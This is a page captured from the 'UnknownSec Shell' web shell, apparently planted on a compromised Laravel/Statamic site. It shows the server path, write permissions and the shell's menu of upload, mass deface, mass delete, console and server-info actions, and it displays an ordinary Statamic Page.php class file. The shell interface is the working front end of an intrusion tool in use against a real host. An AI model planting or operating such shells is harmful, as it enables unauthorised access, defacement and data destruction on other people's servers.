shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
StaticCaching
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Page.php
<?php namespace Statamic\StaticCaching; use Illuminate\Contracts\Support\Responsable; use Illuminate\Http\Response; class Page implements Responsable { public function __construct( public string $content, public array $headers = [], public int $status = 200 ) { } public function toResponse($request): Response { return new Response($this->content, $this->status, $this->headers); } }
© 2026 UnknownSec